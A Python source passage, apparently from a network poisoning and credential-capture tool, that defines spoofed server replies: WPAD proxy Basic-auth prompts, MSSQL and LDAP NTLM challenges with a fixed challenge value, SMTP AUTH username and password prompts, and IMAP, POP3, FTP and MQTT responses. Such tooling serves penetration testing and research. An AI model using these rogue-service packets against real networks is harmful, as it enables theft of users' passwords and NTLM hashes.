("CRLF", "\r\n"),
|
|
])
|
|
|
|
def calculate(self,payload):
|
|
self.fields["Payload"] = b64encode(payload)
|
|
|
|
class WPAD_Basic_407_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWW-Auth", "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
|
|
("Connection", "Proxy-Connection: close\r\n"),
|
|
("Cache-Control", "Cache-Control: no-cache\r\n"),
|
|
("Pragma", "Pragma: no-cache\r\n"),
|
|
("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
##### WEB Dav Stuff #####
|
|
class WEBDAV_Options_Answer(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
|
|
("Connection", "Connection: Keep-Alive\r\n"),
|
|
("Content-Type", "Content-Type: text/html\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
##### FTP Packets #####
|
|
class FTPPacket(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "220"),
|
|
("Separator", "\x20"),
|
|
("Message", "Welcome"),
|
|
("Terminator", "\x0d\x0a"),
|
|
])
|
|
|
|
##### SQL Packets #####
|
|
class MSSQLPreLoginAnswer(Packet):
|
|
fields = OrderedDict([
|
|
("PacketType", "\x04"),
|
|
("Status", "\x01"),
|
|
("Len", "\x00\x25"),
|
|
("SPID", "\x00\x00"),
|
|
("PacketID", "\x01"),
|
|
("Window", "\x00"),
|
|
("TokenType", "\x00"),
|
|
("VersionOffset", "\x00\x15"),
|
|
("VersionLen", "\x00\x06"),
|
|
("TokenType1", "\x01"),
|
|
("EncryptionOffset", "\x00\x1b"),
|
|
("EncryptionLen", "\x00\x01"),
|
|
("TokenType2", "\x02"),
|
|
("InstOptOffset", "\x00\x1c"),
|
|
("InstOptLen", "\x00\x01"),
|
|
("TokenTypeThrdID", "\x03"),
|
|
("ThrdIDOffset", "\x00\x1d"),
|
|
("ThrdIDLen", "\x00\x00"),
|
|
("ThrdIDTerminator", "\xff"),
|
|
("VersionStr", "\x09\x00\x0f\xc3"),
|
|
("SubBuild", "\x00\x00"),
|
|
("EncryptionStr", "\x02"),
|
|
("InstOptStr", "\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"])
|
|
VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])
|
|
EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])
|
|
InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"])
|
|
ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"])
|
|
|
|
self.fields["Len"] = StructWithLenPython2or3(">h",len(CalculateCompletePacket))
|
|
#Version
|
|
self.fields["VersionLen"] = StructWithLenPython2or3(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"]))
|
|
self.fields["VersionOffset"] = StructWithLenPython2or3(">h",len(VersionOffset))
|
|
#Encryption
|
|
self.fields["EncryptionLen"] = StructWithLenPython2or3(">h",len(self.fields["EncryptionStr"]))
|
|
self.fields["EncryptionOffset"] = StructWithLenPython2or3(">h",len(EncryptionOffset))
|
|
#InstOpt
|
|
self.fields["InstOptLen"] = StructWithLenPython2or3(">h",len(self.fields["InstOptStr"]))
|
|
self.fields["EncryptionOffset"] = StructWithLenPython2or3(">h",len(InstOpOffset))
|
|
#ThrdIDOffset
|
|
self.fields["ThrdIDOffset"] = StructWithLenPython2or3(">h",len(ThrdIDOffset))
|
|
|
|
class MSSQLNTLMChallengeAnswer(Packet):
|
|
fields = OrderedDict([
|
|
("PacketType", "\x04"),
|
|
("Status", "\x01"),
|
|
("Len", "\x00\xc7"),
|
|
("SPID", "\x00\x00"),
|
|
("PacketID", "\x01"),
|
|
("Window", "\x00"),
|
|
("TokenType", "\xed"),
|
|
("SSPIBuffLen", "\xbc\x00"),
|
|
("Signature", "NTLMSSP"),
|
|
("SignatureNull", "\x00"),
|
|
("MessageType", "\x02\x00\x00\x00"),
|
|
("TargetNameLen", "\x06\x00"),
|
|
("TargetNameMaxLen", "\x06\x00"),
|
|
("TargetNameOffset", "\x38\x00\x00\x00"),
|
|
("NegoFlags", "\x05\x02\x89\xa2"),
|
|
("ServerChallenge", ""),
|
|
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("TargetInfoLen", "\x7e\x00"),
|
|
("TargetInfoMaxLen", "\x7e\x00"),
|
|
("TargetInfoOffset", "\x3e\x00\x00\x00"),
|
|
("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
|
|
("TargetNameStr", settings.Config.Domain),
|
|
("Av1", "\x02\x00"),#nbt name
|
|
("Av1Len", "\x06\x00"),
|
|
("Av1Str", settings.Config.Domain),
|
|
("Av2", "\x01\x00"),#Server name
|
|
("Av2Len", "\x14\x00"),
|
|
("Av2Str", settings.Config.MachineName),
|
|
("Av3", "\x04\x00"),#Full Domain name
|
|
("Av3Len", "\x12\x00"),
|
|
("Av3Str", settings.Config.DomainName),
|
|
("Av4", "\x03\x00"),#Full machine domain name
|
|
("Av4Len", "\x28\x00"),
|
|
("Av4Str", settings.Config.MachineName+'.'+settings.Config.DomainName),
|
|
("Av5", "\x05\x00"),#Domain Forest Name
|
|
("Av5Len", "\x12\x00"),
|
|
("Av5Str", settings.Config.DomainName),
|
|
("Av6", "\x00\x00"),#AvPairs Terminator
|
|
("Av6Len", "\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
# First convert to unicode
|
|
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le').decode('latin-1')
|
|
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le').decode('latin-1')
|
|
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le').decode('latin-1')
|
|
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le').decode('latin-1')
|
|
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le').decode('latin-1')
|
|
|
|
# Then calculate
|
|
CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
|
|
CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
|
|
CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
|
|
CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
|
|
CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
|
|
|
|
self.fields["Len"] = StructWithLenPython2or3(">h",len(CalculateCompletePacket))
|
|
self.fields["SSPIBuffLen"] = StructWithLenPython2or3("<i",len(CalculateSSPI))[:2]
|
|
# Target Name Offsets
|
|
self.fields["TargetNameOffset"] = StructWithLenPython2or3("<i", len(CalculateNameOffset))
|
|
self.fields["TargetNameLen"] = StructWithLenPython2or3("<i", len(self.fields["TargetNameStr"]))[:2]
|
|
self.fields["TargetNameMaxLen"] = StructWithLenPython2or3("<i", len(self.fields["TargetNameStr"]))[:2]
|
|
# AvPairs Offsets
|
|
self.fields["TargetInfoOffset"] = StructWithLenPython2or3("<i", len(CalculateAvPairsOffset))
|
|
self.fields["TargetInfoLen"] = StructWithLenPython2or3("<i", len(CalculateAvPairsLen))[:2]
|
|
self.fields["TargetInfoMaxLen"] = StructWithLenPython2or3("<i", len(CalculateAvPairsLen))[:2]
|
|
# AvPairs StrLen
|
|
self.fields["Av1Len"] = StructWithLenPython2or3("<i", len(str(self.fields["Av1Str"])))[:2]
|
|
self.fields["Av2Len"] = StructWithLenPython2or3("<i", len(str(self.fields["Av2Str"])))[:2]
|
|
self.fields["Av3Len"] = StructWithLenPython2or3("<i", len(str(self.fields["Av3Str"])))[:2]
|
|
self.fields["Av4Len"] = StructWithLenPython2or3("<i", len(str(self.fields["Av4Str"])))[:2]
|
|
self.fields["Av5Len"] = StructWithLenPython2or3("<i", len(str(self.fields["Av5Str"])))[:2]
|
|
|
|
##### SMTP Packets #####
|
|
class SMTPGreeting(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "220"),
|
|
("Separator", "\x20"),
|
|
("Message", settings.Config.DomainName+" ESMTP"),
|
|
("CRLF", "\x0d\x0a"),
|
|
])
|
|
|
|
class SMTPAUTH(Packet):
|
|
fields = OrderedDict([
|
|
("Code0", "250"),
|
|
("Separator0", "\x2d"),
|
|
("Message0", settings.Config.DomainName),
|
|
("CRLF0", "\x0d\x0a"),
|
|
("Code", "250"),
|
|
("Separator", "\x20"),
|
|
("Message", "AUTH LOGIN PLAIN XYMCOOKIE"),
|
|
("CRLF", "\x0d\x0a"),
|
|
])
|
|
|
|
class SMTPAUTH1(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "334"),
|
|
("Separator", "\x20"),
|
|
("Message", "VXNlcm5hbWU6"),#Username
|
|
("CRLF", "\x0d\x0a"),
|
|
|
|
])
|
|
|
|
class SMTPAUTH2(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "334"),
|
|
("Separator", "\x20"),
|
|
("Message", "UGFzc3dvcmQ6"),#Password
|
|
("CRLF", "\x0d\x0a"),
|
|
])
|
|
|
|
##### IMAP Packets #####
|
|
class IMAPGreeting(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "* OK IMAP4 service is ready."),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
class IMAPCapability(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
class IMAPCapabilityEnd(Packet):
|
|
fields = OrderedDict([
|
|
("Tag", ""),
|
|
("Message", " OK CAPABILITY completed."),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
##### MQTT Packets #####
|
|
class MQTTv3v4ResponsePacket(Packet):
|
|
fields = OrderedDict([
|
|
("Type", "\x20"),
|
|
("Len", "\x02"),
|
|
("Session", "\x00"),
|
|
("Code", "\x04"),
|
|
])
|
|
|
|
class MQTTv5ResponsePacket(Packet):
|
|
fields = OrderedDict([
|
|
("Type", "\x20"),
|
|
("Len", "\x03"),
|
|
("Session", "\x00"),
|
|
("Code", "\x86"),
|
|
("Prop", "\x00"),
|
|
])
|
|
|
|
##### POP3 Packets #####
|
|
class POPOKPacket(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "+OK"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
class POPNotOKPacket(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "-ERR"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
##### LDAP Packets #####
|
|
class LDAPSearchDefaultPacket(Packet):
|
|
fields = OrderedDict([
|
|
("ParserHeadASNID", "\x30"),
|
|
("ParserHeadASNLen", "\x0c"),
|
|
("MessageIDASNID", "\x02"),
|
|
("MessageIDASNLen", "\x01"),
|
|
("MessageIDASNStr", "\x0f"),
|
|
("OpHeadASNID", "\x65"),
|
|
("OpHeadASNIDLen", "\x07"),
|
|
("SearchDoneSuccess", "\x0A\x01\x00\x04\x00\x04\x00"),#No Results.
|
|
])
|
|
|
|
class LDAPSearchSupportedCapabilitiesPacket(Packet):
|
|
fields = OrderedDict([
|
|
("ParserHeadASNID", "\x30"),
|
|
("ParserHeadASNLenOfLen", "\x84"),
|
|
("ParserHeadASNLen", "\x00\x00\x00\x7e"),#126
|
|
("MessageIDASNID", "\x02"),
|
|
("MessageIDASNLen", "\x01"),
|
|
("MessageIDASNStr", "\x02"),
|
|
("OpHeadASNID", "\x64"),
|
|
("OpHeadASNIDLenOfLen", "\x84"),
|
|
("OpHeadASNIDLen", "\x00\x00\x00\x75"),#117
|
|
("ObjectName", "\x04\x00"),
|
|
("SearchAttribASNID", "\x30"),
|
|
("SearchAttribASNLenOfLen", "\x84"),
|
|
("SearchAttribASNLen", "\x00\x00\x00\x6d"),#109
|
|
("SearchAttribASNID1", "\x30"),
|
|
("SearchAttribASN1LenOfLen", "\x84"),
|
|
("SearchAttribASN1Len", "\x00\x00\x00\x67"),#103
|
|
("SearchAttribASN2ID", "\x04"),
|
|
("SearchAttribASN2Len", "\x15"),#21
|
|
("SearchAttribASN2Str", "supportedCapabilities"),
|
|
("SearchAttribASN3ID", "\x31"),
|
|
("SearchAttribASN3LenOfLen", "\x84"),
|
|
("SearchAttribASN3Len", "\x00\x00\x00\x4a"),
|
|
("SearchAttrib1ASNID", "\x04"),
|
|
("SearchAttrib1ASNLen", "\x16"),#22
|
|
("SearchAttrib1ASNStr", "1.2.840.113556.1.4.800"),
|
|
("SearchAttrib2ASNID", "\x04"),
|
|
("SearchAttrib2ASNLen", "\x17"),#23
|
|
("SearchAttrib2ASNStr", "1.2.840.113556.1.4.1670"),
|
|
("SearchAttrib3ASNID", "\x04"),
|
|
("SearchAttrib3ASNLen", "\x17"),#23
|
|
("SearchAttrib3ASNStr", "1.2.840.113556.1.4.1791"),
|
|
("SearchDoneASNID", "\x30"),
|
|
("SearchDoneASNLenOfLen", "\x84"),
|
|
("SearchDoneASNLen", "\x00\x00\x00\x10"),#16
|
|
("MessageIDASN2ID", "\x02"),
|
|
("MessageIDASN2Len", "\x01"),
|
|
("MessageIDASN2Str", "\x02"),
|
|
("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
|
|
## No need to calculate anything this time, this packet is generic.
|
|
])
|
|
|
|
class LDAPSearchSupportedMechanismsPacket(Packet):
|
|
fields = OrderedDict([
|
|
("ParserHeadASNID", "\x30"),
|
|
("ParserHeadASNLenOfLen", "\x84"),
|
|
("ParserHeadASNLen", "\x00\x00\x00\x60"),#96
|
|
("MessageIDASNID", "\x02"),
|
|
("MessageIDASNLen", "\x01"),
|
|
("MessageIDASNStr", "\x02"),
|
|
("OpHeadASNID", "\x64"),
|
|
("OpHeadASNIDLenOfLen", "\x84"),
|
|
("OpHeadASNIDLen", "\x00\x00\x00\x57"),#87
|
|
("ObjectName", "\x04\x00"),
|
|
("SearchAttribASNID", "\x30"),
|
|
("SearchAttribASNLenOfLen", "\x84"),
|
|
("SearchAttribASNLen", "\x00\x00\x00\x4f"),#79
|
|
("SearchAttribASNID1", "\x30"),
|
|
("SearchAttribASN1LenOfLen", "\x84"),
|
|
("SearchAttribASN1Len", "\x00\x00\x00\x49"),#73
|
|
("SearchAttribASN2ID", "\x04"),
|
|
("SearchAttribASN2Len", "\x17"),#23
|
|
("SearchAttribASN2Str", "supportedSASLMechanisms"),
|
|
("SearchAttribASN3ID", "\x31"),
|
|
("SearchAttribASN3LenOfLen", "\x84"),
|
|
("SearchAttribASN3Len", "\x00\x00\x00\x2a"),#42
|
|
("SearchAttrib1ASNID", "\x04"),
|
|
("SearchAttrib1ASNLen", "\x06"),#6
|
|
("SearchAttrib1ASNStr", "GSSAPI"),
|
|
("SearchAttrib2ASNID", "\x04"),
|
|
("SearchAttrib2ASNLen", "\x0a"),#10
|
|
("SearchAttrib2ASNStr", "GSS-SPNEGO"),
|
|
("SearchAttrib3ASNID", "\x04"),
|
|
("SearchAttrib3ASNLen", "\x08"),#8
|
|
("SearchAttrib3ASNStr", "EXTERNAL"),
|
|
("SearchAttrib4ASNID", "\x04"),
|
|
("SearchAttrib4ASNLen", "\x0a"),#10
|
|
("SearchAttrib4ASNStr", "DIGEST-MD5"),
|
|
("SearchDoneASNID", "\x30"),
|
|
("SearchDoneASNLenOfLen", "\x84"),
|
|
("SearchDoneASNLen", "\x00\x00\x00\x10"),#16
|
|
("MessageIDASN2ID", "\x02"),
|
|
("MessageIDASN2Len", "\x01"),
|
|
("MessageIDASN2Str", "\x02"),
|
|
("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
|
|
## No need to calculate anything this time, this packet is generic.
|
|
])
|
|
|
|
class LDAPNTLMChallenge(Packet):
|
|
fields = OrderedDict([
|
|
("ParserHeadASNID", "\x30"),
|
|
("ParserHeadASNLenOfLen", "\x84"),
|
|
("ParserHeadASNLen", "\x00\x00\x00\xD0"),#208
|
|
("MessageIDASNID", "\x02"),
|
|
("MessageIDASNLen", "\x01"),
|
|
("MessageIDASNStr", "\x02"),
|
|
("OpHeadASNID", "\x61"),
|
|
("OpHeadASNIDLenOfLen", "\x84"),
|
|
("OpHeadASNIDLen", "\x00\x00\x00\xc7"),#199
|
|
("Status", "\x0A"),
|
|
("StatusASNLen", "\x01"),
|
|
("StatusASNStr", "\x0e"), #In Progress.
|
|
("MatchedDN", "\x04\x00"), #Null
|
|
("ErrorMessage", "\x04\x00"), #Null
|
|
("SequenceHeader", "\x87"),
|
|
("SequenceHeaderLenOfLen", "\x81"),
|
|
("SequenceHeaderLen", "\x82"), #188
|
|
("NTLMSSPSignature", "NTLMSSP"),
|
|
("NTLMSSPSignatureNull", "\x00"),
|
|
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
|
|
("NTLMSSPNtWorkstationLen", "\x1e\x00"),
|
|
("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
|
|
("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
|
|
("NTLMSSPNtNegotiateFlags", "\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
|
|
("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
|
("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
|
|
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
|
|
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionHigh", "\x0a"),
|
|
("NegTokenInitSeqMechMessageVersionLow", "\x00"),
|
|
("NegTokenInitSeqMechMessageVersionBuilt", "\x7c\x4f"),
|
|
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
|
|
("NTLMSSPNtWorkstationName", settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsUnicodeStr", settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", settings.Config.MachineName),
|
|
("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", settings.Config.MachineName+'.'+settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
###### Convert strings to Unicode first
|
|
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
|
|
###### Workstation Offset
|
|
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
|
###### AvPairs Offset
|
|
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
###### LDAP Packet Len
|
|
CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
|
|
OperationPacketLen = str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
|
|
NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
|
|
|
|
##### LDAP Len Calculation:
|
|
self.fields["ParserHeadASNLen"] = StructWithLenPython2or3(">i", len(CalculatePacketLen))
|
|
self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">i", len(OperationPacketLen))
|
|
self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen))
|
|
##### Workstation Offset Calculation:
|
|
self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation))
|
|
self.fields["NTLMSSPNtWorkstationLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtWorkstationMaxLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
##### IvPairs Offset Calculation:
|
|
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
|
